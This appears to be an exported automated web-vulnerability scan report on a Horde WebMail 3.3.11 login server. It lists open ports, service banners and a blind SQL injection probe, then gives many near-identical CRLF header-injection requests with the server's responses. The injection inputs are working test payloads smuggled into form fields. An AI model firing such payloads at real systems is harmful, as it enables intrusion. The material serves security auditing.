![]() | Horde WebMail Version 3.3.11 HTTP Header Injection Report | CWE-113 24 May, 2011 |
|||||||||||||||||
XSS, Cross Site Scripting in Horde WebMail Version 3.3.11, CWE-79, CAPEC-86, DORK, GHDB Report | ||||||||||||||||||
Generated by Acunetix WVS Reporter (v7.0 Build 20110518) |
Scan of http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php | ||||||||||||||||||
Scan details | ||||||||||||||||||
Scan information | ||||||||||||||||||
Starttime | 5/22/2011 10:13:04 AM | |||||||||||||||||
Finish time | 5/22/2011 11:41:16 AM | |||||||||||||||||
Scan time | 1 hours, 28 minutes | |||||||||||||||||
Profile | Default | |||||||||||||||||
Server information | ||||||||||||||||||
Responsive | True | |||||||||||||||||
Server banner | Microsoft-IIS/7.5 | |||||||||||||||||
Server OS | Windows | |||||||||||||||||
Server technologies | ASP.NET | |||||||||||||||||
Threat level | ||||||||||||||||||
![]() | Acunetix Threat Level 3 One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these vulnerabilities and compromise the backend database and/or deface your website. |
|||||||||||||||||
Alerts distribution | ||||||||||||||||||
Total alerts found | 136 | |||||||||||||||||
![]() | High | 30 | ||||||||||||||||
![]() | Medium | 0 | ||||||||||||||||
![]() | Low | 39 | ||||||||||||||||
![]() | Informational | 67 | ||||||||||||||||
Knowledge base | ||||||||||||||||||
List of open TCP ports | ||||||||||||||||||
Open Port 25 / smtp Port Banner: P.home ESMTP MailEnable Service, Version: 5.10-- ready at 05/22/11 10:13:23 Open Port 21 / ftp No port banner available. Open Port 53 / domain No port banner available. Open Port 80 / http Port Banner: HTTP/1.1 200 OKType: text/htmlModified: Sat, 21 May 2011 16:23:04 GMTRanges: bytes: "e07c565cd317cc1:0": Microsoft-IIS/7.5Powered-By: ASP.NET: Sun, 22 May 2011 15:15:11 GMT: close ... Open Port 110 / pop3 Port Banner: +OK Welcome to MailEnable POP3 Server |
||||||||||||||||||
Acunetix Website Audit | 2 |
Open Port 135 / msrpc No port banner available. Open Port 143 / imap Port Banner: * OK IMAP4rev1 server ready at 05/22/11 10:17:14 Open Port 445 / microsoft-ds No port banner available. Open Port 3389 / ms-term-serv No port banner available. Open Port 8081 / blackice-icecap No port banner available. Open Port 8443 / https-alt No port banner available. |
||||||||||||||||||
DNS server running | ||||||||||||||||||
A DNS server is running on UDP port 53. | ||||||||||||||||||
DNS server running on TCP | ||||||||||||||||||
A DNS server is running on TCP port 53. | ||||||||||||||||||
Whois lookup | ||||||||||||||||||
Whois result for IP address 50.23.106.58: % This is the RIPE Database query service. % The objects are in RPSL format. % % The RIPE Database is subject to Terms and Conditions. % See http://www.ripe.net/db/support/db-terms-conditions.pdf % Note: this output has been filtered. % To receive output for a database update, use the "-B" flag. % Information related to '0.0.0.0 - 255.255.255.255' : 0.0.0.0 - 255.255.255.255: IANA-BLK: The whole IPv4 address space: EU # Country is really world wide: ORG-IANA1-RIPEc: IANA1-RIPEc: IANA1-RIPE: ALLOCATED UNSPECIFIED: The country is really worldwide.: This address space is assigned at various other places in: the world and might therefore not be in the RIPE database.by: RIPE-NCC-HM-MNTlower: RIPE-NCC-HM-MNTroutes: RIPE-NCC-RPSL-MNT: RIPE # Filtered : ORG-IANA1-RIPEname: Internet Assigned Numbers Authoritytype: IANA: see http://www.iana.org: The IANA allocates IP addresses and AS number blocks to RIRs: see http://www.iana.org/ipaddress/ip-addresses.htm: and http://www.iana.org/assignments/as-numbersmail: bitbucket@ripe.netc: IANA1-RIPEc: IANA1-RIPEref: RIPE-NCC-HM-MNTby: RIPE-NCC-HM-MNT: RIPE # Filtered : Internet Assigned Numbers Authority: see http://www.iana.org.mail: bitbucket@ripe.netc: IANA1-RIPEc: IANA1-RIPEhdl: IANA1-RIPE: For more information on IANA services: go to IANA web site at http://www.iana.org.by: RIPE-NCC-MNT: RIPE # Filtered |
||||||||||||||||||
POP3 server running | ||||||||||||||||||
A POP3 server is running on TCP port 110. | ||||||||||||||||||
SMTP server running | ||||||||||||||||||
A SMTP server is running on TCP port 25. Information gathered from this service: | ||||||||||||||||||
Acunetix Website Audit | 3 |
EHLO returns: 250-home [173.193.214.243], this server offers 4 extensions -AUTH LOGIN -SIZE 5120000 -HELP AUTH=LOGIN returns: 211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP |
||||||||||||||||||
List of file extensions | ||||||||||||||||||
File extensions can provide information on what technologies are being used on this website. List of file extensions detected: php => 6 file(s) css => 4 file(s) ico => 1 file(s) png => 14 file(s) gif => 6 file(s) js => 4 file(s) |
||||||||||||||||||
List of files with inputs | ||||||||||||||||||
These files have at least one input (GET or POST). /imp/login.php - 2 inputs /imp/redirect.php - 2 inputs /imp/test.php - 1 inputs |
||||||||||||||||||
List of email addresses | ||||||||||||||||||
List of all email addresses found on this host. md@webbplatsen.se |
||||||||||||||||||
Alerts summary | ||||||||||||||||||
![]() | Blind SQL Injection - Unconfirmed | |||||||||||||||||
Affects | Variations | |||||||||||||||||
/imp/redirect.php | 1 | |||||||||||||||||
![]() | CRLF injection/HTTP response splitting | |||||||||||||||||
Affects | Variations | |||||||||||||||||
/imp/redirect.php | 29 | |||||||||||||||||
![]() | Possible sensitive directories | |||||||||||||||||
Affects | Variations | |||||||||||||||||
/imp/config | 1 | |||||||||||||||||
/imp/js/src | 1 | |||||||||||||||||
/imp/scripts | 1 | |||||||||||||||||
/imp/scripts/SQL | 1 | |||||||||||||||||
/imp/scripts/sql | 1 | |||||||||||||||||
/js/src | 1 | |||||||||||||||||
![]() | Possible sensitive files | |||||||||||||||||
Affects | Variations | |||||||||||||||||
/imp/test.php | 1 | |||||||||||||||||
Acunetix Website Audit | 4 |
Alert details | ||||||||||||||||||
Blind SQL Injection | ||||||||||||||||||
![]() |
||||||||||||||||||
Severity | High | |||||||||||||||||
Type | Validation | |||||||||||||||||
Reported by module | Scripting (Blind_Sql_Injection.script) | |||||||||||||||||
Description | ||||||||||||||||||
This script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable. |
||||||||||||||||||
Impact | ||||||||||||||||||
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine. |
||||||||||||||||||
Recommendation | ||||||||||||||||||
Your script should filter metacharacters from user input. Check detailed information for more information about fixing this vulnerability. |
||||||||||||||||||
Affected items | ||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input loginButton was set to -1" or "3"="3 | ||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 174 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=&autologin=0&ie_version=&imapuser=edrriwil&load_frameset=1&loginButton=%24%7binjecthere%7d&new_lang=da_DK&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT |
||||||||||||||||||
Acunetix Website Audit | 8 |
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=edrriwil&server=pop&horde_logout_token=SX7NiW9kAj-kGWWo8hM1gbRVj5Y&app=imp&logout_reason=badlogin Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 22 May 2011 16:03:39 GMT |
||||||||||||||||||
CRLF injection/HTTP response splitting | ||||||||||||||||||
![]() |
||||||||||||||||||
Severity | High | |||||||||||||||||
Type | Validation | |||||||||||||||||
Reported by module | Scripting (CRLF_Injection.script) | |||||||||||||||||
Description | ||||||||||||||||||
This script is possibly vulnerable to CRLF injection attacks. HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure. HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response. |
||||||||||||||||||
Impact | ||||||||||||||||||
Is it possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies or HTML code. This may conduct to vulnerabilities like XSS (cross-site scripting) or session fixation. | ||||||||||||||||||
Recommendation | ||||||||||||||||||
You need to restrict CR(0x13) and LF(0x10) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers. | ||||||||||||||||||
Affected items | ||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 250 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=cs_CZ&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache |
||||||||||||||||||
Acunetix Website Audit | 9 |
Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=G-zU3534X9MH1OkaR-Pw-x4ty0Q&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:55 GMT |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 250 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=zh_CN&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=wN9VHj4zjEO2C0TR8BCh0BaU-os&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:57 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 250 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host |
||||||||||||||||||
Acunetix Website Audit | 10 |
Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&lo |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=RuYfFuLgyCOWLmAlQQqWepUU4NU&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 Set-Cookie: Horde=d6e932f8e8d339db1a98ae22a9a61407; path=/; domain=vulnerable.horde.webmail.version3.3.11.host SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:53 GMT Content-Length: 321 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=atsoewoc&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=atsoewoc&server=pop&horde_logout_token=-kD5soUKvsA66mwPMaVGbRacUcE&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:41 GMT Content-Length: 485 |
||||||||||||||||||
Acunetix Website Audit | 11 |
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 250 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=da_DK&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=Ues1GksiKBjr_ID-KW8Ee8vY2Fw&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:14:00 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ggqsiwfl&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 |
||||||||||||||||||
Acunetix Website Audit | 12 |
Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=ggqsiwfl&server=pop&horde_logout_token=KowJ1XzmjCnX28fnMeYsi_w1opM&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:44 GMT |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 250 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=zh_TW&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=vj2EpqQv9c5mlXuhnALm83XwPE4&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:59 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 |
||||||||||||||||||
Acunetix Website Audit | 13 |
Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=uwbkfapt&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acU |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=uwbkfapt&server=pop&horde_logout_token=D3A2KJAQHXQx4-3RvsKZG2NDrUo&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:37 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 250 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&Horde=cc98ab8bb445fe090d5f7b594f58e208&ie_version=&imapuser=pstxmuoi&load_frameset=1&loginButton=Login&new_lang=bg_BG&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=pstxmuoi&server=pop&horde_logout_token=Uddd9JXywL2qaX2qI12LvX7K5SY&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:13:52 GMT Content-Length: 485 |
||||||||||||||||||
Acunetix Website Audit | 14 |
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=hurcfetk&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=hurcfetk&server=pop&horde_logout_token=uVHbrt7nsI-2C6IQ2Rs3BhAQUe0&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:32 GMT Content-Length: 485 |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=sjtjgfnc&load_frameset=1&loginButton=Login&new_lang=ar_OM&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 |
||||||||||||||||||
Acunetix Website Audit | 15 |
Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php?imapuser=sjtjgfnc&server=pop&horde_logout_token=erClDmqfBbtYxJKZsU07BQLWN-Q&app=imp&logout_reason=badlogin# Vary: Accept-Encoding Server: Microsoft-IIS/7.5 SomeCustomInjectedHeader: injected_by_wvs X-Powered-By: ASP.NET Date: Sun, 22 May 2011 15:39:34 GMT |
||||||||||||||||||
/imp/redirect.php | ||||||||||||||||||
Details | ||||||||||||||||||
URL encoded POST input anchor_string was set to SomeCustomInjectedHeader:injected_by_wvs Injected header found: : injected_by_wvs |
||||||||||||||||||
Request | ||||||||||||||||||
POST /imp/redirect.php HTTP/1.1 Content-Length: 211 Content-Type: application/x-www-form-urlencoded Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208 Host: vulnerable.horde.webmail.version3.3.11.host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* actionID=&anchor_string=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&autologin=0&ie_version=&imapuser=ymdqagel&load_frameset=1&loginButton=Login&new_lang=da_DK&pass=acUn3t1x&server=pop&server_key=pop&url= |
||||||||||||||||||
Response | ||||||||||||||||||
